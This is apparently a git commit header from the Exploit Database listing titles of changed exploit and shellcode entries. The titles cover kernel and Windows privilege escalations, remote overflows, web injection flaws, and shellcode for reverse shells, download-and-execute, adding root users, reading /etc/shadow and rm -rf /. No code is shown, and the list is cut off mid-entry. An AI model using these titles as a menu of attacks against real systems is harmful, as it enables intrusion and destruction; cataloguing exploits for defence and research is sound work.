From f589361686e6d2d9374af953ba4ee89f1aa1d9b5 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 13 Jan 2018 05:02:13 +0000 Subject: [PATCH] DB: 2018-01-13 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 1949 changes to exploits/shellcodes Bird Chat 1.61 - Denial of Service Quake 3 Engine Client (Windows x86) - CS_ITEms Remote Overflow Mercur IMAPD 5.00.14 (Windows x86) - Remote Denial of Service PHP 5.2.0 (Windows x86) - 'PHP_win32sti' Local Buffer Overflow PHP 5.2.0 (Windows x86) - 'PHP_iisfunc.dll' Local Buffer Overflow 32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow (PoC) Apple Safari 3.2.3 (Windows x86) - JavaScript 'eval' Remote Denial of Service Apple Safari 4.0.3 (Windows x86) - 'CSS' Remote Denial of Service (1) Apple Safari 4.0.3 (Windows x86) - 'CSS' Remote Denial of Service (2) HP Data Protector Media Operations - Null Pointer Dereference Remote Denial of Service AnyDVD 6.7.1.0 - Denial of Service Microsoft Windows - Win32k Pointer Dereferencement (PoC) (MS10-098) Apple Safari - GdiDrawStream Blue Screen of Death Oracle VM VirtualBox 4.1 - Local Denial of Service Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035) VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read Linux Kernel 3.17.5 - IRET Instruction #SS Fault Handling Crash (PoC) Samba < 3.6.2 (x86) - Denial of Service (PoC) Adobe Flash (Linux x64) - Bad Dereference at 0x23c Adobe Flash - XMLSocket Destructor Not Cleared Before Setting User Data in connect Adobe Flash - Heap Buffer Overflow Loading '.FLV' File with Nellymoser Audio Codec Adobe Flash - Heap Buffer Overflow Due to Indexing Error When Loading FLV File Adobe Flash - Shared Object Type Confusion Adobe Flash - Heap Buffer Overflow Loading '.FLV' File with Nellymoser Audio Codec Adobe Flash - Heap Buffer Overflow Due to Indexing Error When Loading FLV File Adobe Flash - Shared Object Type Confusion ActiveState Perl.exe x64 Client 5.20.2 - Crash (PoC) Microsoft Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (2) Microsoft Windows Kernel - 'DeferWindowPos' Use-After-Free (MS15-073) Microsoft Windows Kernel - 'UserCommitDesktopMemory' Use-After-Free (MS15-073) Microsoft Windows Kernel - Pool Buffer Overflow Drawing Caption Bar (MS15-061) Microsoft Windows Kernel - 'HmgAllocateObjectAttr' Use-After-Free (MS15-061) Microsoft Windows Kernel - 'win32k!vSolidFillRect' Buffer Overflow (MS15-061) Microsoft Windows Kernel - 'SURFOBJ' Null Pointer Dereference (MS15-061) Microsoft Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (2) Microsoft Windows Kernel - 'DeferWindowPos' Use-After-Free (MS15-073) Microsoft Windows Kernel - 'UserCommitDesktopMemory' Use-After-Free (MS15-073) Microsoft Windows Kernel - Pool Buffer Overflow Drawing Caption Bar (MS15-061) Microsoft Windows Kernel - 'HmgAllocateObjectAttr' Use-After-Free (MS15-061) Microsoft Windows Kernel - 'win32k!vSolidFillRect' Buffer Overflow (MS15-061) Microsoft Windows Kernel - 'SURFOBJ' Null Pointer Dereference (MS15-061) Microsoft Windows Kernel - WindowStation Use-After-Free (MS15-061) Microsoft Windows Kernel - Null Pointer Dereference with Window Station and Clipboard (MS15-061) Microsoft Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (1) Microsoft Windows Kernel - 'FlashWindowEx​' Memory Corruption (MS15-097) Microsoft Windows Kernel - 'bGetRealizedBrush' Use-After-Free (MS15-097) Microsoft Windows Kernel - Use-After-Free with Cursor Object (MS15-097) Microsoft Windows Kernel - Use-After-Free with Printer Device Contexts (MS15-097) Microsoft Windows Kernel - 'NtGdiStretchBlt' Pool Buffer Overflow (MS15-097) Microsoft Windows Kernel - WindowStation Use-After-Free (MS15-061) Microsoft Windows Kernel - Null Pointer Dereference with Window Station and Clipboard (MS15-061) Microsoft Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (1) Microsoft Windows Kernel - 'FlashWindowEx​' Memory Corruption (MS15-097) Microsoft Windows Kernel - 'bGetRealizedBrush' Use-After-Free (MS15-097) Microsoft Windows Kernel - Use-After-Free with Cursor Object (MS15-097) Microsoft Windows Kernel - Use-After-Free with Printer Device Contexts (MS15-097) Microsoft Windows Kernel - 'NtGdiStretchBlt' Pool Buffer Overflow (MS15-097) Microsoft Windows Kernel - 'NtGdiBitBlt' Buffer Overflow (MS15-097) Tomabo MP4 Converter 3.10.12 < 3.11.12 - '.m3u' File Crush Application (Denial of Service) Google Chrome - open-vcdiff Out-of-Bounds Read in Browser Process Integer Overflow win32k Desktop and Clipboard - Null Pointer Dereference win32k Clipboard Bitmap - Use-After-Free win32k Desktop and Clipboard - Null Pointer Dereference win32k Clipboard Bitmap - Use-After-Free Adobe Flash Selection.SetSelection - Use-After-Free Adobe Flash Sound.setTransform - Use-After-Free Adobe Flash - Use-After-Free When Setting Stage Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited Microsoft Windows Kernel - DrawMenuBarTemp Wild-Write (MS16-039) Core FTP Server 32-bit Build 587 - Heap Overflow Microsoft Windows - Custom Font Disable Policy Bypass Wireshark 2.0.0 < 2.0.4 - CORBA IDL Dissectors Denial of Service Evostream Media Server 1.7.1 (x64) - Denial of Service Kentico CMS 11.0 - Buffer Overflow PyroBatchFTP < 3.19 - Buffer Overflow Microsoft Edge 38.14393.1066.0 - 'textarea.defaultValue' Memory Disclosure Navicat Premium 11.2.11 (x64) - Local Database Password Disclosure PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure Oracle 10g (Windows x86) - 'PROCESS_DUP_HANDLE' Local Privilege Escalation GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow Notepad++ 4.1 (Windows x86) - '.ruby' File Processing Buffer Overflow Linux Kernel 2.4/2.6 (x86-64) - System Call Emulation Privilege Escalation PHP 5.2.9 (Windows x86) - Local Safemod Bypass Linux Kernel 2.6.24_16-23/2.6.27_7-10/2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - 'set_selection()' UTF-8 Off-by-One Privilege Escalation Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1) HTMLDOC 1.9.x-r1629 (Windows x86) - '.html' Local Buffer Overflow RadASM - '.rap' file Local Buffer Overflow Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Local Stack Buffer Overflow Universal Audiotran 1.4.2.4 - Local Overflow (SEH) Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Local Privilege Escalation Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Local Privilege Escalation Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation (1) Linux Kernel 4.6.3 (x86) - 'Netfilter' Local Privilege Escalation (Metasploit) VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit) QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows (ASLR + DEP Bypass) (Metasploit) PHP 5.4.3 (Windows x86 Polish) - Code Execution Microsoft Windows Kernel - Intel x64 SYSRET (MS12-042) Dropbox Desktop Client 9.4.49 (x64) - Local Credentials Disclosure Linux Kernel 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Local Privilege Escalation (1) Linux Kernel 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Local Privilege Escalation (2) Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Local Privilege Escalation (2) Novell Client 2 SP3 - 'nicm.sys' Local Privilege Escalation (Metasploit) Solaris Recommended Patch Cluster 6/19 (x86) - Local Privilege Escalation Nvidia (nvsvc) Display Driver Service - Local Privilege Escalation (Metasploit) Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local Privilege Escalation (3) LogMeIn Client 1.3.2462 (x64) - Local Credentials Disclosure Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit) Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege Escalation Linux Kernel 3.2.0-23/3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Privilege Escalation (3) TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure OpenVPN Private Tunnel Core Service - Unquoted Service Path Privilege Escalation Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Local Privilege Escalation Microsoft Windows XP SP3 - 'MQAC.sys' Arbitrary Write Privilege Escalation (Metasploit) Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Local Privilege Escalation Microsoft Windows XP SP3 - 'MQAC.sys' Arbitrary Write Privilege Escalation (Metasploit) Microsoft Bluetooth Personal Area Networking - 'BthPan.sys' Local Privilege Escalation (Metasploit) Microsoft Windows - OLE Package Manager Code Execution (MS14-060) (Metasploit) Offset2lib - Bypassing Full ASLR On 64 bit Linux Linux Kernel (x86-64) - Rowhammer Privilege Escalation Rowhammer - NaCl Sandbox Escape Linux Kernel (x86-64) - Rowhammer Privilege Escalation Rowhammer - NaCl Sandbox Escape Microsoft Windows 8.0/8.1 (x64) - 'TrackPopupMenu' Local Privilege Escalation (MS14-058) Linux espfix64 - Nested NMIs Interrupting Privilege Escalation Linux (x86) - Memory Sinkhole Privilege Escalation Linux espfix64 - Nested NMIs Interrupting Privilege Escalation Linux (x86) - Memory Sinkhole Privilege Escalation Microsoft Windows XP SP3 (x86) / 2003 SP2 (x86) - 'NDProxy' Local Privilege Escalation (MS14-002) Microsoft Windows - Font Driver Buffer Overflow (MS15-078) (Metasploit) TrueCrypt 7 / VeraCrypt 1.13 - Drive Letter Symbolic Link Creation Privilege Escalation Microsoft Windows 8.1 - 'win32k' Local Privilege Escalation (MS15-010) MySQL 5.5.45 (x64) - Local Credentials Disclosure Microsoft Windows 7 SP1 (x86) - 'WebDAV' Local Privilege Escalation (MS16-016) (1) Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040) Secret Net 7 and Secret Net Studio 8 - Local Privilege Escalation Microsoft Windows 7 (x64) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040) Microsoft Windows 8.1/10 (x86) - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032) ACROS Security 0patch 2016.05.19.539 - '0PatchServicex64.exe' Unquoted Service Path Privilege Escalation Microsoft Windows 7 SP1 (x86) - Local Privilege Escalation (MS16-014) Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit) Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046) Microsoft Windows (x86) - 'NDISTAPI' Local Privilege Escalation (MS11-062) Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098) PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Local Privilege Escalation Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Local Privilege Escalation Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Local Privilege Escalation Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Local Privilege Escalation Oracle VM VirtualBox 5.0.32 r112930 (x64) - Windows Process COM Injection Privilege Escalation Linux Kernel - 'offset2lib' Stack Clash Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Local Privilege Escalation Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Local Privilege Escalation Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation Linux Kernel - 'offset2lib' Stack Clash Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Local Privilege Escalation Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Local Privilege Escalation Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation Razer Synapse 2.20.15.1104 - rzpnk.sys ZwOpenProcess (Metasploit) Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) (2) Microsoft Windows 10 RS2 (x64) - 'win32kfull!bFill' Pool Overflow Microsoft Windows 10 Creators Update (version 1703) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation BeroFTPD 1.3.4(1) (Linux x86) - Remote Code Execution Microsoft Windows (x86) - Metafile '.emf' Heap Overflow (MS04-032) Veritas NetBackup 6.0 (Windows x86) - 'bpjava-msvc' Remote Command Execution gpsdrive 2.09 (x86) - 'friendsd2' Remote Format String PrivateWire Gateway 3.7 (Windows x86) - Remote Buffer Overflow (Metasploit) dproxy-nexgen (Linux x86) - Remote Buffer Overflow Apache mod_rewrite (Windows x86) - Off-by-One Remote Overflow 3proxy 0.5.3g (Windows x86) - 'proxy.c logurl()' Remote Buffer Overflow 3proxy 0.5.3g (Windows x86) - 'logurl()' Remote Buffer Overflow (Perl) SapLPD 6.28 (Windows x86) - Remote Buffer Overflow Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow 32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow 32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow 32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH) 32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit) 32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow 32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow 32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH) 32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit) Microsoft Internet Explorer 6/7/8 - 'winhlp32.exe MsgBox()' Remote Code Execution Integard Home and Pro 2 - Remote HTTP Buffer Overflow Knox Arkeia Backup Client Type 77 (Windows x86) - Remote Overflow (Metasploit) Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit) Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit) AASync 2.2.1.0 (Windows x86) - Remote Stack Buffer Overflow 'LIST' (Metasploit) 32bit FTP Client - Remote Stack Buffer Overflow (Metasploit) SHOUTcast DNAS/Win32 1.9.4 - File Request Format String Overflow (Metasploit) SHTTPD 1.34 (Windows x86) - URI-Encoded POST Request Overflow (Metasploit) Icecast 2.0.1 (Windows x86) - Header Overwrite (Metasploit) Apache (Windows x86) - Chunked Encoding (Metasploit) McAfee ePolicy Orchestrator / ProtectionPilot - Remote Overflow (Metasploit) Apache (Windows x86) - Chunked Encoding (Metasploit) McAfee ePolicy Orchestrator / ProtectionPilot - Remote Overflow (Metasploit) PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit) Oracle 9i XDB (Windows x86) - HTTP PASS Overflow (Metasploit) CA CAM (Windows x86) - 'log_security()' Remote Stack Buffer Overflow (Metasploit) Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit) Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit) Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit) Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit) WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (3) Nginx 1.3.9/1.4.0 (x86) - Brute Force Nginx 1.4.0 (Generic Linux x64) - Remote Overflow Oracle VM VirtualBox 4.3.6 - 3D Acceleration Virtual Machine Escape (Metasploit) Symantec Endpoint Protection Manager - Authentication Bypass / Code Execution (Metasploit) Symantec pcAnywhere 12.5.0 (Windows x86) - Remote Code Execution PCMan FTP Server 2.0.7 - 'RENAME' Remote Buffer Overflow (Metasploit) PCMan FTP Server 2.0.7 - 'ls' Remote Buffer Overflow (Metasploit) ALLMediaServer 0.95 - Buffer Overflow Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007) Rancher Server - Docker Daemon Code Execution (Metasploit) Unitrends UEB 9 - http api/storage Remote Root (Metasploit) Unitrends UEB 9 - bpserverd Authentication Bypass Remote Command Execution (Metasploit) Unitrends UEB 9 - http api/storage Remote Root (Metasploit) Unitrends UEB 9 - bpserverd Authentication Bypass Remote Command Execution (Metasploit) Microsoft Internet Explorer 11 (Windows 7 x86) - 'mshtml.dll' Remote Code Execution (MS17-007) PHP-Nuke 8.1 SEO Arabic - Remote File Inclusion Joomla! Component Elite Experts - SQL Injection Traidnt UP - Cross-Site Request Forgery (Add Admin) Allpc 2.5 osCommerce - SQL Injection / Cross-Site Scripting Infoblox 6.8.2.11 - OS Command Injection Xnami 1.0 - Cross-Site Scripting Taxi Booking Script 1.0 - Cross-site Scripting FreeBSD/x86 - ConnectBack (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes) FreeBSD/x86 - Reverse Connection (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes) FreeBSD/x86 - setuid(0); + execve(ipf -Fa); Shellcode (57 bytes) FreeBSD/x86 - setuid(0) + execve(ipf -Fa) Shellcode (57 bytes) Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes) Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]); Shellcode (60 bytes) Linux/MIPS - execve /bin/sh Shellcode (56 bytes) Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]) Shellcode (60 bytes) Linux/MIPS (Little Endian) - execve(/bin/sh) Shellcode (56 bytes) Linux/x86 - Self-Modifying Anti-IDS /bin/sh Shellcode (35/64 bytes) Linux/x86 - HTTP Server (8800/TCP) + Fork Shellcode (166 bytes) Linux/x86 - Bind TCP Listener (5555/TCP) + Receive Shellcode + Payload Loader Shellcode (83 bytes) Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes) Linux/x86 - killall5 Polymorphic Shellcode (61 bytes) Linux/x86 - execve /bin/sh Polymorphic Shellcode (48 bytes) Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) XOR Encoded Shellcode (152 bytes) Linux/x86 - reboot() Polymorphic Shellcode (57 bytes) Linux/x86 - chmod 666 /etc/shadow Polymorphic Shellcode (54 bytes) Linux/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh__0_0) Shellcode (34 bytes) Linux/x86 - Bind TCP Shell (8000/TCP) + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes) Linux/x86 - Bind TCP Shell (8000/TCP) + Add Root User Shellcode (225+ bytes) Linux/x86 - Bind TCP /bin/sh Shell (8000/TCP) Shellcode (179 bytes) Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes) Linux/x86 - Serial Port Shell Binding (/dev/ttyS0) + busybox Launching Null-Free Shellcode (82 bytes) Linux/x86 - File Unlinker Shellcode (18+ bytes) Linux/x86 - Perl Script Execution Shellcode (99+ bytes) Linux/x86 - Read /etc/passwd Shellcode (65+ bytes) Linux/x86 - chmod 666 /etc/shadow + exit(0) Shellcode (30 bytes) Linux/x86 - killall5 Shellcode (34 bytes) Linux/x86 - PUSH reboot() Shellcode (30 bytes) Linux/x86 - Self-Modifying Anti-IDS /bin/sh Shellcode (35/64 bytes) Linux/x86 - HTTP Server (8800/TCP) + Fork Shellcode (166 bytes) Linux/x86 - Bind TCP Listener (5555/TCP) + Receive Shellcode + Payload Loader Shellcode (83 bytes) Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes) Linux/x86 - killall5 Polymorphic Shellcode (61 bytes) Linux/x86 - execve /bin/sh Polymorphic Shellcode (48 bytes) Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) XOR Encoded Shellcode (152 bytes) Linux/x86 - reboot() Polymorphic Shellcode (57 bytes) Linux/x86 - chmod 666 /etc/shadow Polymorphic Shellcode (54 bytes) Linux/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh__0_0) Shellcode (34 bytes) Linux/x86 - Bind TCP Shell (8000/TCP) + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes) Linux/x86 - Bind TCP Shell (8000/TCP) + Add Root User Shellcode (225+ bytes) Linux/x86 - Bind TCP /bin/sh Shell (8000/TCP) Shellcode (179 bytes) Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes) Linux/x86 - Serial Port Shell Binding (/dev/ttyS0) + busybox Launching Null-Free Shellcode (82 bytes) Linux/x86 - File Unlinker Shellcode (18+ bytes) Linux/x86 - Perl Script Execution Shellcode (99+ bytes) Linux/x86 - Read /etc/passwd Shellcode (65+ bytes) Linux/x86 - chmod 666 /etc/shadow + exit(0) Shellcode (30 bytes) Linux/x86 - killall5 Shellcode (34 bytes) Linux/x86 - PUSH reboot() Shellcode (30 bytes) Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes) Linux/x86 - Append RSA key to /root/.ssh/authorized_keys2 Shellcode (295 bytes) Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access Shellcode (86 bytes) Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes) Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Null-Free Shellcode (28 bytes) Linux/x86 - setresuid(0_0_0) + /bin/sh Shellcode (35 bytes) Linux/x86 - iopl(3); asm(cli); while(1){} Shellcode (12 bytes) Linux/x86 - System Beep Shellcode (45 bytes) Linux/x86 - ConnectBack (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes) Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes) Linux/x86 - Reverse TCP cat /etc/shadow (8192/TCP) Shellcode (155 bytes) Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes) Linux/x86 - /bin/rm -rf / + Attempts To Block The Process From Being Stopped Shellcode (132 bytes) Linux/x86 - setuid(0) + setgid(0) + aslr_off (Disable ASLR Security) Shellcode (79 bytes) Linux/x86 - Raw-Socket ICMP/Checksum /bin/sh Shell Shellcode (235 bytes) Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes) Linux/x86 - Kill All Processes Shellcode (11 bytes) Linux/x86 - execve read Shellcode (92 bytes) Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (40 bytes) Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes) Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes) Linux/x86 - chmod 0666 /etc/shadow + exit Shellcode (36 bytes) Linux/x86 - Fork Bomb Shellcode (7 bytes) Linux/x86 - execve(rm -rf /) Shellcode (45 bytes) Linux/x86 - setuid(0) + execve /bin/sh Shellcode (28 bytes) Linux/x86 - execve /bin/sh Shellcode (22 bytes) Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes) Linux/x86 - setreuid + Executes Command Shellcode (49+ bytes) Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes) Linux/x86 - execve /bin/sh (Re-Use Of Strings In .rodata) Shellcode (16 bytes) Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes) Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + setuid Shellcode (96 bytes) Linux/x86 - Bind TCP Shell (2707/TCP) Shellcode (84 bytes) Linux/x86 - execve Diassembly Obfuscation Shellcode (32 bytes) Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (100 bytes) Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes) Linux/x86 - Append RSA key to /root/.ssh/authorized_keys2 Shellcode (295 bytes) Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access Shellcode (86 bytes) Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes) Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Null-Free Shellcode (28 bytes) Linux/x86 - setresuid(0_0_0) + /bin/sh Shellcode (35 bytes) Linux/x86 - iopl(3) + asm(cli) + while(1){} Shellcode (12 bytes) Linux/x86 - System Beep Shellcode (45 bytes) Linux/x86 - Reverse Connection (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes) Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes) Linux/x86 - Reverse TCP cat /etc/shadow (8192/TCP) Shellcode (155 bytes) Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes) Linux/x86 - /bin/rm -rf / + Attempts To Block The Process From Being Stopped Shellcode (132 bytes) Linux/x86 - setuid(0) + setgid(0) + aslr_off (Disable ASLR Security) Shellcode (79 bytes) Linux/x86 - Raw-Socket ICMP/Checksum /bin/sh Shell Shellcode (235 bytes) Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes) Linux/x86 - Kill All Processes Shellcode (11 bytes) Linux/x86 - execve read Shellcode (92 bytes) Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (40 bytes) Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes) Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes) Linux/x86 - chmod 0666 /etc/shadow + exit Shellcode (36 bytes) Linux/x86 - Fork Bomb Shellcode (7 bytes) Linux/x86 - execve(rm -rf /) Shellcode (45 bytes) Linux/x86 - setuid(0) + execve /bin/sh Shellcode (28 bytes) Linux/x86 - execve /bin/sh Shellcode (22 bytes) Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes) Linux/x86 - setreuid + Executes Command Shellcode (49+ bytes) Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes) Linux/x86 - execve /bin/sh (Re-Use Of Strings In .rodata) Shellcode (16 bytes) Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes) Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + setuid Shellcode (96 bytes) Linux/x86 - Bind TCP Shell (2707/TCP) Shellcode (84 bytes) Linux/x86 - execve Diassembly Obfuscation Shellcode (32 bytes) Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (100 bytes) Linux/x86 - execve /bin/sh Shellcode (24 bytes) (2) Linux/x86 - Reverse TCP Shell (127.0.0.1:80/TCP) XOR Encoded Shellcode (371 bytes) Linux/x86 - execve /bin/sh + '.ZIP' Header Shellcode (28 bytes) Linux/x86 - execve /bin/sh + '.RTF' Header Shellcode (30 bytes) Linux/x86 - execve /bin/sh + '.RIFF' Header Shellcode (28 bytes) Linux/x86 - execve /bin/sh + '.BMP' Bitmap Header Shellcode (27 bytes) Linux/x86 - Read SWAP + Write To /tmp/swr Shellcode (109 bytes) Linux/x86 - Read /tmp/sws + Store In SWAP Shellcode (99 bytes) Linux/x86 - Bind TCP /bin/sh Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes) Linux/x86 - Bind TCP /bin/sh Shell (64713/TCP) Shellcode (86 bytes) Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (25 bytes) Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (23 bytes) Linux/x86 - setuid(0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (31 bytes) Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes) Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes) Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() Null-Free Shellcode 